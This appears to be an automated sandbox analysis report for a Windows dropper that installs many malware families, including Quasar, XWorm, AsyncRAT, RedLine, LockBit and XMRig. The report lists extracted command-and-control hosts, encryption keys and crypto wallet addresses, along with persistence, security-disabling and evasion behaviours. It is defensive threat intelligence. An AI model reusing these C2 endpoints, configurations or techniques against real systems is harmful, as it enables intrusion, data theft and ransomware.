Resubmissions
14-11-2024 23:57
241114-3zzkpavhpf 1014-11-2024 23:44
241114-3rj52avgna 1014-11-2024 23:36
241114-3ln7ssvjfs 1014-11-2024 23:24
241114-3dnajayler 1014-11-2024 23:10
241114-25qpastqgt 10Analysis
-
max time kernel
235s -
max time network
291s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-11-2024 23:57
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
quasar
1.4.0
Target
127.0.0.1:6070
affasdqa.ddns.net:6070
haffasdqa.duckdns.org:6070
670d21b7-71ed-4958-9ba7-a58fa54d8203
-
encryption_key
25B2622CE0635F9A273AB61B1B7D7B94220AC509
-
install_name
svhoste.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
svhoste
-
subdirectory
SubDir
Extracted
phorphiex
http://185.215.113.66/
http://91.202.233.141/
0xCa90599132C4D88907Bd8E046540284aa468a035
TRuGGXNDM1cavQ1AqMQHG8yfxP4QWVSMN6
qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
XryzFMFVpDUvU7famUGf214EXD3xNUSmQf
rsXCXBf9SagxV8JfC12d8Bybk84oPdMNN9
AULzfBuUAPfCGAXoG5Vq14aP9s6fx3AH4Z
LTK4xdKPAgFHPLan8kriAD7eY4heyy73mB
MP8GEm8QpYgQYaMo8oM5NQhRBgDGiLZW5Q
4BB7ckkaPTyADc8trtuwDoZxywaR4eNL5cDJ3KBjq9GraN4mUFztf7mLS7WgT7Bh7uPqpjvA4ypVwXKCJ1vvLWWAFvSmDoD
15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC
1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK
ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp
3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc
3ESHude8zUHksQg1h6hHmzY79BS36L91Yn
DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA
t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh
stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj
bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2
bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr
bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd
bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r
GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3
-
mutex
mmn7nnm8na
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Extracted
phorphiex
http://185.215.113.84
Extracted
quasar
-
reconnect_delay
3000
Extracted
xworm
5.0
178.215.224.96:7886
eI2rMhB46IPDjynT
-
install_file
USB.exe
Extracted
xworm
147.185.221.22:47930
127.0.0.1:47930
-
Install_directory
%AppData%
-
install_file
svchost.exe
Extracted
quasar
1.4.0
Office04
192.168.31.99:4782
2001:4bc9:1f98:a4e::676:4782
255.255.255.0:4782
fe80::cabf:4cff:fe84:9572%17:4782
1f65a787-81b8-4955-95e4-b7751e10cd50
-
encryption_key
A0B82A50BBC49EC084E3E53A9E34DF58BD7050B9
-
install_name
Neverlose Loader.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Java Updater
-
subdirectory
SubDir
Extracted
asyncrat
0.5.8
Default
18.ip.gl.ply.gg:6606
18.ip.gl.ply.gg:7707
18.ip.gl.ply.gg:8808
18.ip.gl.ply.gg:9028
HyFTucy74RnH
-
delay
3
-
install
true
-
install_file
Discord.exe
-
install_folder
%AppData%
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.2
Default
47.238.55.14:4449
rqwcncaesrdtlckoweu
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
cryptbot
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
62.113.117.95:4449
hwelcvbupaqfzors
-
delay
10
-
install
false
-
install_folder
%AppData%
Signatures
-
Ammyy Admin
Remote admin tool with various capabilities.
-
AmmyyAdmin payload 1 IoCs
resource yara_rule behavioral1/files/0x000400000001da8a-2652.dat family_ammyyadmin -
Ammyyadmin family
-
Asyncrat family
-
Cryptbot family
-
Detect Xworm Payload 11 IoCs
resource yara_rule behavioral1/memory/2464-1910-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/2464-1909-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/2464-1908-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/2464-1905-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/2464-1903-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm behavioral1/memory/3692-1976-0x00000000010A0000-0x00000000010BA000-memory.dmp family_xworm behavioral1/files/0x000400000001da35-2352.dat family_xworm behavioral1/memory/2480-4658-0x0000000000CE0000-0x0000000000CF0000-memory.dmp family_xworm behavioral1/files/0x0004000000020dd6-6163.dat family_xworm behavioral1/memory/1384-6218-0x00000000011A0000-0x00000000011B0000-memory.dmp family_xworm behavioral1/memory/3464-6282-0x000000001B8A0000-0x000000001B8CC000-memory.dmp family_xworm -
FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
-
Flawedammyy family
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Lockbit family
-
Modifies security service 2 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" sysmablsvr.exe -
Phorphiex family
-
Phorphiex payload 4 IoCs
resource yara_rule behavioral1/files/0x0006000000016d47-132.dat family_phorphiex behavioral1/files/0x0006000000016d50-148.dat family_phorphiex behavioral1/files/0x000800000001d3ec-1776.dat family_phorphiex behavioral1/files/0x0003000000020a30-3446.dat family_phorphiex -
Quasar family
-
Quasar payload 10 IoCs
resource yara_rule behavioral1/files/0x000800000001620e-115.dat family_quasar behavioral1/memory/2816-119-0x0000000000910000-0x0000000000994000-memory.dmp family_quasar behavioral1/memory/1588-124-0x00000000003C0000-0x0000000000444000-memory.dmp family_quasar behavioral1/memory/664-185-0x0000000000380000-0x0000000000404000-memory.dmp family_quasar behavioral1/memory/1220-302-0x0000000000FC0000-0x0000000001044000-memory.dmp family_quasar behavioral1/memory/1840-1507-0x0000000000100000-0x0000000000184000-memory.dmp family_quasar behavioral1/memory/2372-1584-0x00000000059B0000-0x0000000005A2D000-memory.dmp family_quasar behavioral1/memory/2896-1845-0x0000000000200000-0x0000000000284000-memory.dmp family_quasar behavioral1/memory/3160-2103-0x00000000001D0000-0x0000000000254000-memory.dmp family_quasar behavioral1/memory/3116-2635-0x00000000013A0000-0x0000000001424000-memory.dmp family_quasar -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/2856-2517-0x0000000000950000-0x000000000098E000-memory.dmp family_redline -
Redline family
-
Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
resource yara_rule behavioral1/files/0x0005000000019fc9-577.dat family_lockbit -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 3376 created 1180 3376 1229421168.exe 21 PID 3376 created 1180 3376 1229421168.exe 21 PID 2332 created 1180 2332 winupsecvmgr.exe 21 PID 2332 created 1180 2332 winupsecvmgr.exe 21 PID 2332 created 1180 2332 winupsecvmgr.exe 21 PID 2832 created 1180 2832 Boxing.pif 21 PID 2832 created 1180 2832 Boxing.pif 21 PID 352 created 1180 352 nxmr.exe 21 PID 352 created 1180 352 nxmr.exe 21 PID 3832 created 1180 3832 winupsecvmgr.exe 21 PID 2588 created 1180 2588 Thermal.pif 21 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe -
Xmrig family
-
Xworm family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0005000000020dd2-5010.dat family_asyncrat -
Renames multiple (317) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/2332-1492-0x000000013F090000-0x000000013F627000-memory.dmp xmrig behavioral1/memory/1508-1502-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1508-1569-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1508-1798-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1508-2142-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1656-6311-0x0000000006B70000-0x00000000072F1000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2080 powershell.exe 1924 powershell.exe 4240 powershell.exe 4748 powershell.exe 4596 powershell.exe 6708 powershell.exe 440 powershell.exe 908 powershell.exe 3552 powershell.exe 5512 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3536 netsh.exe 1212 netsh.exe -
Drops startup file 12 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam.lnk XClient.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk svchost.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\46422e05e6e5062fec6d0ab906669fb9.exe SteamDetector.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\46422e05e6e5062fec6d0ab906669fb9.exe SteamDetector.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftServe.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam.lnk XClient.exe -
Executes dropped EXE 64 IoCs
pid Process 2816 svhoste.exe 1588 svhoste.exe 2348 twztl.exe 2196 sysppvrdnvs.exe 2392 3.exe 2652 sysklnorbcv.exe 664 svhoste.exe 1236 1754010522.exe 2208 unison.exe 2796 2362724532.exe 2688 2572212193.exe 3040 1334316928.exe 1220 svhoste.exe 2620 259973368.exe 2808 136198103.exe 696 2924327870.exe 2860 1960333372.exe 2008 820810029.exe 3036 svhoste.exe 3328 F3B2.tmp 3376 1229421168.exe 2332 winupsecvmgr.exe 3052 svhoste.exe 1840 svhoste.exe 1280 6.exe 820 shttpsr_mg.exe 3696 setup8.exe 872 neonn.exe 3564 Identification-1.exe 1764 meteran.exe 904 o.exe 3384 tt.exe 2896 svhoste.exe 748 crypted25.exe 2352 testme.exe 3296 sysmablsvr.exe 3608 ChatLife.exe 3692 svchost.exe 3856 AnneSalt.exe 984 SteamDetector.exe 3160 Neverlose%20Loader.exe 932 1436610214.exe 1408 23c2343.exe 1456 SteamDetector.exe 2832 Boxing.pif 2856 frap.exe 2240 channel.exe 2676 12382869.exe 3116 svhoste.exe 3876 PkContent.exe 3584 1832728749.exe 2120 Paraguay.pif 352 nxmr.exe 1356 AA_v3.exe 3156 AA_v3.exe 336 AA_v3.exe 3208 ConsoleApp2.exe 3092 1665822621.exe 2752 rat.exe 3432 Cbmefxrmnv.exe 1252 rat.exe 2044 processclass.exe 3832 winupsecvmgr.exe 2136 r.exe -
Loads dropped DLL 64 IoCs
pid Process 2372 4363463463464363463463463.exe 2372 4363463463464363463463463.exe 2372 4363463463464363463463463.exe 2372 4363463463464363463463463.exe 2372 4363463463464363463463463.exe 2196 sysppvrdnvs.exe 2372 4363463463464363463463463.exe 2652 sysklnorbcv.exe 2196 sysppvrdnvs.exe 2652 sysklnorbcv.exe 2196 sysppvrdnvs.exe 2652 sysklnorbcv.exe 2196 sysppvrdnvs.exe 2652 sysklnorbcv.exe 1236 1754010522.exe 1236 1754010522.exe 3112 WerFault.exe 3112 WerFault.exe 3112 WerFault.exe 3112 WerFault.exe 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 2008 820810029.exe 696 2924327870.exe 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 3836 taskeng.exe 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE 1180 Explorer.EXE -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysklnorbcv.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" sysppvrdnvs.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" sysmablsvr.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" sysmablsvr.exe -
Adds Run key to start application 2 TTPs 12 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" twztl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysmablsvr.exe" tt.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysvplervcs.exe" r.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\VolumeInfo = "C:\\Users\\Admin\\AppData\\Roaming\\VolumeInfo.exe" Cbmefxrmnv.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\Steam.exe" XClient.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\documents\\OneDrive.exe" OneDrive.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysklnorbcv.exe" 3.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\46422e05e6e5062fec6d0ab906669fb9 = "\"C:\\Users\\Admin\\AppData\\Roaming\\SteamDetector.exe\" .." SteamDetector.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\46422e05e6e5062fec6d0ab906669fb9 = "\"C:\\Users\\Admin\\AppData\\Roaming\\SteamDetector.exe\" .." SteamDetector.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\neon = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\neon.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Users\\Admin\\sysvplervcs.exe" a.exe -
Drops desktop.ini file(s) 2 IoCs
description ioc Process File opened for modification C:\$Recycle.Bin\S-1-5-21-3290804112-2823094203-3137964600-1000\desktop.ini 820810029.exe File opened for modification F:\$RECYCLE.BIN\S-1-5-21-3290804112-2823094203-3137964600-1000\desktop.ini 820810029.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: pomadachashin.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 153 raw.githubusercontent.com 345 pastebin.com 346 pastebin.com 10 raw.githubusercontent.com 11 raw.githubusercontent.com 135 bitbucket.org 137 bitbucket.org 145 raw.githubusercontent.com 233 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 165 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 AA_v3.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer pomadachashin.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName pomadachashin.exe -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created D:\autorun.inf SteamDetector.exe File created F:\autorun.inf SteamDetector.exe File opened for modification F:\autorun.inf SteamDetector.exe File created C:\autorun.inf SteamDetector.exe File opened for modification C:\autorun.inf SteamDetector.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 1464 tasklist.exe 1232 tasklist.exe 780 tasklist.exe 2376 tasklist.exe 1632 tasklist.exe 3244 tasklist.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\IPjaex13M.bmp" 820810029.exe Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\IPjaex13M.bmp" 820810029.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 2008 820810029.exe 3328 F3B2.tmp -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 2332 set thread context of 1968 2332 winupsecvmgr.exe 147 PID 2332 set thread context of 1508 2332 winupsecvmgr.exe 148 PID 748 set thread context of 2464 748 crypted25.exe 185 PID 872 set thread context of 3204 872 neonn.exe 241 PID 3432 set thread context of 4344 3432 Cbmefxrmnv.exe 321 PID 4244 set thread context of 5016 4244 crypted.exe 323 PID 2120 set thread context of 5352 2120 Paraguay.pif 325 PID 4788 set thread context of 5412 4788 legas.exe 371 PID 3204 set thread context of 2376 3204 InstallUtil.exe 335 -
resource yara_rule behavioral1/memory/820-1586-0x0000000000400000-0x000000000047D000-memory.dmp upx behavioral1/files/0x000d00000001d3d0-1582.dat upx behavioral1/memory/820-1595-0x0000000000400000-0x000000000047D000-memory.dmp upx behavioral1/memory/1252-3417-0x000007FEEC3A0000-0x000007FEECA65000-memory.dmp upx behavioral1/files/0x000400000001da9b-3425.dat upx behavioral1/memory/4880-6231-0x0000000000400000-0x0000000000B81000-memory.dmp upx behavioral1/memory/4880-6390-0x0000000000400000-0x0000000000B81000-memory.dmp upx -
Drops file in Windows directory 23 IoCs
description ioc Process File created C:\Windows\Tasks\Test Task17.job Cbmefxrmnv.exe File created C:\Windows\sysklnorbcv.exe 3.exe File created C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\UnsignedProcedures AnneSalt.exe File opened for modification C:\Windows\AccompaniedLongest AnneSalt.exe File opened for modification C:\Windows\PortugalCharges PkContent.exe File created C:\Windows\sysvplervcs.exe r.exe File created C:\Windows\sysppvrdnvs.exe twztl.exe File opened for modification C:\Windows\sysmablsvr.exe tt.exe File opened for modification C:\Windows\ReceptorsTeeth PkContent.exe File opened for modification C:\Windows\MonsterRaymond PkContent.exe File opened for modification C:\Windows\sysppvrdnvs.exe twztl.exe File opened for modification C:\Windows\sysklnorbcv.exe 3.exe File opened for modification \??\c:\windows\installer\{ac76ba86-7ad7-1033-7b44-a90000000001}\pdffile_8.ico chrome.exe File opened for modification C:\Windows\VermontDisplaying AnneSalt.exe File opened for modification C:\Windows\BadlyAssured AnneSalt.exe File created C:\Windows\sysvplervcs.exe a.exe File opened for modification C:\Windows\SkinHd AnneSalt.exe File opened for modification C:\Windows\PgJune PkContent.exe File opened for modification C:\Windows\PorcelainExhaust PkContent.exe File opened for modification C:\Windows\FirewireBros PkContent.exe File opened for modification C:\Windows\sysvplervcs.exe r.exe File created C:\Windows\Tasks\Test Task17.job lofsawd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1500 sc.exe 556 sc.exe 1724 sc.exe 2860 sc.exe 2916 sc.exe 2628 sc.exe 348 sc.exe 1660 sc.exe 2000 sc.exe 2168 sc.exe -
Detects Pyinstaller 3 IoCs
resource yara_rule behavioral1/files/0x000400000001d3e8-2688.dat pyinstaller behavioral1/files/0x000400000001da4d-2687.dat pyinstaller behavioral1/files/0x00090000000193d9-4739.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
